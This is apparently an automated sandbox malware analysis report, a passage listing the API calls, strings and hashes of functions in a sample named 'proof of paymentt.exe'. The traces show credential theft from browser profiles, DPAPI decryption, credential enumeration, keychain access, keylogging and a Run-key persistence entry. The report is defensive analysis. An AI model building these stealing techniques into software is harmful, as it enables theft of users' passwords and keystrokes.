Uniqueness Score: -1.00%

Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6

Strings

\AppData\Local\Google\Chrome\, xrefs: 0040C4E0
UserProfile, xrefs: 0040C4CA

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Google\Chrome\
API String ID: 1174141254-4188645398
Opcode ID: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
Opcode Fuzzy Hash: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559

Strings

UserProfile, xrefs: 0040C52D
\AppData\Local\Microsoft\Edge\, xrefs: 0040C543

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Microsoft\Edge\
API String ID: 1174141254-2800177040
Opcode ID: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
Opcode Fuzzy Hash: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC

Strings

AppData, xrefs: 0040C590
\Opera Software\Opera Stable\, xrefs: 0040C5A6

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: AppData$\Opera Software\Opera Stable\
API String ID: 1174141254-1629609700
Opcode ID: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
Opcode Fuzzy Hash: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA

Uniqueness

Uniqueness Score: -1.00%

Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 0040B64B

Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1

Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662

Strings

[AltR], xrefs: 0040B681
[AltL], xrefs: 0040B68D

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
String ID: [AltL]$[AltR]
API String ID: 2738857842-2658077756
Opcode ID: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
Opcode Fuzzy Hash: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF

Uniqueness

Uniqueness Score: -1.00%

Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E

Strings

uD, xrefs: 0044ED05

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID:
String ID: uD
API String ID: 0-2547262877
Opcode ID: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
Opcode Fuzzy Hash: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49

Uniqueness

Uniqueness Score: -1.00%

Function 00448957 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996

Strings

PkGNG, xrefs: 00448959
GetSystemTimePreciseAsFileTime, xrefs: 00448972

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Time$FileSystem
String ID: GetSystemTimePreciseAsFileTime$PkGNG
API String ID: 2086374402-949981407
Opcode ID: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
Opcode Fuzzy Hash: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE

Uniqueness

Uniqueness Score: -1.00%

Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8

Strings

open, xrefs: 004161A2
!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: !D@$open
API String ID: 587946157-1586967515
Opcode ID: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
Opcode Fuzzy Hash: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A

Uniqueness

Uniqueness Score: -1.00%

Function 0045554B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE

Download Yara Rule

APIs

___initconout.LIBCMT ref: 0045555B

Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00455560,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000), ref: 00456B30

WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB19,?), ref: 0045557E

Strings

PkGNG, xrefs: 0045554D

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ConsoleCreateFileWrite___initconout
String ID: PkGNG
API String ID: 3087715906-263838557
Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
Instruction ID: e84ccb038854987deafcb7b601af55b429ad8f27f18c1f17be9b2782bd97289a
Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
Instruction Fuzzy Hash: 10E02B70500508BBD610CB64DC25EB63319EB003B1F600315FE25C72D1EB34DD44C759

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000012), ref: 0040B6A5

Strings

[CtrlR], xrefs: 0040B6C2
[CtrlL], xrefs: 0040B6D3

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
Opcode Fuzzy Hash: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF

Uniqueness

Uniqueness Score: -1.00%

Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

__Init_thread_footer.LIBCMT ref: 00410F29

Strings

,kG, xrefs: 00410F04
0kG, xrefs: 00410F31

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: ,kG$0kG
API String ID: 1881088180-2015055088
Opcode ID: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
Opcode Fuzzy Hash: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D

Uniqueness

Uniqueness Score: -1.00%

Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D4CE,00000000,?,00000000), ref: 00413A31
RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A45

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668

Uniqueness

Uniqueness Score: -1.00%

Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
GetLastError.KERNEL32 ref: 00440D35
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
Opcode Fuzzy Hash: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759

Uniqueness

Uniqueness Score: -1.00%

Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
SetLastError.KERNEL32(0000007F), ref: 00411C7A
SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: proof of paymentt.exePID: 7588, Parent PID: 6112COMMON

Executed Functions

Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040DDAD

Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5

CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4

Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8

Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7

NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
_wcsicmp.MSVCRT ref: 0040DEB2
_wcsicmp.MSVCRT ref: 0040DEC5
_wcsicmp.MSVCRT ref: 0040DED8
OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
memset.MSVCRT ref: 0040DF5F
CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
_wcsicmp.MSVCRT ref: 0040DFB2
CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2

Strings

taskhostex.exe, xrefs: 0040DED0
dllhost.exe, xrefs: 0040DEA9
taskhost.exe, xrefs: 0040DEBD

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
String ID: dllhost.exe$taskhost.exe$taskhostex.exe
API String ID: 594330280-3398334509
Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7

Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE

GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
??3@YAXPAX@Z.MSVCRT ref: 00418803

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
String ID:
API String ID: 2947809556-0
Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769

Uniqueness

Uniqueness Score: -1.00%

Function 00404423 Relevance: 4.6, APIs: 3, Instructions: 51libraryencryptionloaderCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498

Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884

GetProcAddress.KERNEL32(?,00000000), ref: 00404453
FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
String ID:
API String ID: 767404330-0
Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755

Uniqueness

Uniqueness Score: -1.00%

Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041898C
GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: InfoSystemmemset
String ID:
API String ID: 3558857096-0
Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

Uniqueness

Uniqueness Score: -1.00%

Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004455C2
wcsrchr.MSVCRT ref: 004455DA
memset.MSVCRT ref: 0044570D
memset.MSVCRT ref: 00445725

Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C

Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2

Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A

memset.MSVCRT ref: 0044573D
memset.MSVCRT ref: 00445755
memset.MSVCRT ref: 004458CB
memset.MSVCRT ref: 004458E3
memset.MSVCRT ref: 0044596E
memset.MSVCRT ref: 00445A10
memset.MSVCRT ref: 00445A28
memset.MSVCRT ref: 00445AC6

Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7

memset.MSVCRT ref: 00445B52
memset.MSVCRT ref: 00445B6A
memset.MSVCRT ref: 00445C9B
memset.MSVCRT ref: 00445CB3
_wcsicmp.MSVCRT ref: 00445D56
memset.MSVCRT ref: 00445B82

Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C

Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04

memset.MSVCRT ref: 00445986

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C

Strings

Apple Computer\Preferences\keychain.plist, xrefs: 00445CD0
*.*, xrefs: 00445ED0

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
String ID: *.*$Apple Computer\Preferences\keychain.plist
API String ID: 2745753283-3798722523
Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041276D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

